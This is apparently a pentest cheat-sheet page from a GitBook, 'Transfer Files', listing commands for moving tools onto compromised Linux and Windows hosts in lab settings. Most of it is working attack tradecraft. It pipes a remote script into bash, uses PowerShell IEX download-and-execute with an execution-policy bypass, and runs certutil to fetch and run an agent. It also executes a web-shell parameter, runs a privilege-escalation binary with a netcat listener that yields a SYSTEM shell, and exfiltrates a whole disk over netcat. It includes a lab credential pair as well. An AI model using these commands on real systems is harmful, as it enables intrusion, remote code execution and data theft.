Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • More
  • Curl
  • smbserver
  • Windows Share
  • HTTP Server One Liners
  • Powershell
  • Powershell Advanced
  • smb setup issues
  • smb setup impacket python2
  • smb optional
  • nc
  • updog
  • ftp
  • Permission Trouble
  • certutil

Was this helpful?

  1. 06 Linux PrivEsc

Transfer Files

PreviousTAR backupsNextvnc

Last updated 2 years ago

Was this helpful?

More

Curl

vim script.py
python -m SimpleHTTPServer 80                     ..share
curl http://10.x.x.x:80/script.py -o /opt/tmp.py  ..d/l overwrite
curl $MyIP:80/LinEnum.sh | bash                   ..d/l execute (linux)

curl --user david:Nowonly4me http://10.x.x.x/~david/
curl --user david:Nowonly4me --negotiate http://10.x.x.x/~david/

smbserver

  • Share from Linux SMB to Windows

locate smbserver.py                             ..find
cd /usr/share/doc/python3-impacket/examples     ..prep
sudo python3 ./smbserver.py share /tmp          ..share
impacket-smbserver share `pwd`                  ..another method
smbclient -L 10.x.x.x --no-pass                 ..test

net view \\10.x.x.x                             ..windows command
net use z: \\10.x.x.x\pub                       ..map a drive
copy "Oracle Issue.txt" z:                      ..copy file
dir \\10.x.x.x\share                            ..windows list directory
copy \\10.x.x.x\share\app C:\Windows\Temp\      ..windows copy
\\10.x.x.x\share\reverse.exe                    ..run

Windows Share

  • Linux: Copy to Windows Share

smbclient //10.x.x.x/sharename -U domain/username
  • Linux: Mount Windows Share

mkdir /mnt/smbshare
sudo mount -t cifs //serverfs/c$ -o username=bob,password=xyz /mnt/smbshare
cd /mnt/smbshare
  • Windows: Copy to Windows Share

copy exploit.exe \\10.x.x.x\users\bob

HTTP Server One Liners

> python2 -m SimpleHTTPServer 80
> python3 -m http.server 80

> php -S localhost:80 -t evil/

> while true; do nc -l 80 < test.html; done

> ncat -k -l -p 80 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/evil.html"

> perl -MIO::All -e 'io(":80")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'

> ruby -run -e httpd . -p 80

From inetd.conf:
> 80 stream tcp nowait nobody cat cat /somefile
... where /somefile has the HTTP response line, headers and body

Powershell

  • Share with Linux: python3 - m http.server

  • Download with Window Powershell

----------------------
powershell.exe "(New-Object System.Net.WebClient).Downloadfile('http://$MyIP:8000/myfile','myfile')"

----------------------
echo IEX(New-Object Net.WebClient).DownloadString('http://<ip>:<port>/Sherlock.ps1') | powershell -noprofile

----------------------
echo $WebClient = New-Object System.Net.WebClient > wget.ps1
echo $WebClient.DownloadFile($Args[0],$Args[1]) >>  wget.ps1
powershell -ExecutionPolicy Bypass -File wget.ps1 http://$MyIP:8000/file.exe file.exe

----------------------
http://10.x.x.x/ippsec.php?fexec=systeminfo
http://10.x.x.x/ippsec.php?fexec=echo IES(New-Object Net.WebClient).DownloadString('http://10.x.x.x:8000/PowerUp.ps1')|powershell -noprofile

Powershell Advanced

  • Can't execute the payload?

  • Powershell ByPass Execution Policy

cd C:\ColdFusion8\  or:
cd C:\Windows\Temp

echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1

Chimichurri.exe 10.10.14.x 5555
nc -nvlp 5555
connected ..system!!

smb setup issues

  • Run smbserver.py from Linux

  • Now Windows can share back to Linux

------------------------
Install Attempts:

python --version
python3 --version
apt-get install python3.6-dev libmysqlclient-dev
pip install --upgrade setuptools --user python
sudo apt-get install libpcap-dev libpq-dev
pip3 install --upgrade setuptools --user python
cd /opt/impacket
sudo -i
git clone https://github.com/SecureAuthCorp/impacket.git
pip install .
pip3 install .
python3 -m pip install -U pip
python3 -m pip install -U setuptools
pip install impacket
pip3 install impacket

smb setup impacket python2

Install the old pip (unofficial way)
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python get-pip.py

PATH=/home/kali/.local/bin:$PATH     ..update PATH manually

pip --version                        ..confirm v2 not v3
pip 20.3.4 from /home/kali/.local/lib/python2.7/site-packages/pip (python 2.7)

pip install --upgrade setuptools
pip install impacket

smb optional

> impacket-smbserver share `myfolder`
http://10.x.x.x/ippsec.php?fexe=\\10.x.x.x\share\privesc.exe whoami

nc

Easy:

nc -lp 4444 > out.file
nc -w 3 DestIP 4444 < out.file


Faster:

nc -lp 4444 | uncompress -c | tar xvfp -
tar cfp - /some/dir | compress -c | nc -w 3 DestIP 4444


Whole Hard Drive:

dd if=/dev/hda3 | gzip -9 | nc -l 3333
nc DestIP 3333 | pv -b > hdImage.img.gz

updog

  • Looks like an interesting option if you need SSL

  • Default port 9090

updog
updog -p 4444 --ssl
updog -d /tmp --password mypax

ftp

  • anonymous, writable, port 2121

linux:
pip install pyftpdlib
python -m pyftpdlib -w
python3 -m pyftpdlib -p 21 -u mike -P paxx
 
windows:
ftp
open $MyIP
user mike passwurd
passive
put localfilename remotefilename
bye

ftp -n < ftpcommands.txt   ..optional

Permission Trouble

  • You may have a permissions problem

  • Save and execute from the Temp folder!

cd C:\Windows\Temp\
copy \\10.x.x.x\share\myapp.exe .
myapp.exe

certutil

  • You can download files on Windows with this tool

  • REF: bountyHTB

rs.Exec("certutil -urlcache -split -f http://10.x.x.x/agent.exe C:\\users\\public\\agent.exe")
rs.Exec("cmd /c C:\users\public\agent.exe")   ..execute
http://10.x.x.x/UploadedFiles/web.config      ..execute

Example:

REF:

Example:

https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/
https://gist.github.com/willurd/5720255
PowershellCheatsheet
https://blog.ropnop.com/transferring-files-from-kali-to-windows/
https://github.com/SecureAuthCorp/impacket
https://github.com/sc0tfree/updog
https://pythonhosted.org/pyftpdlib/faqs.html
DrupalPhpVuln
ChimichurriWindowsPrivEsc
ChurrascoWindowsPrivEsc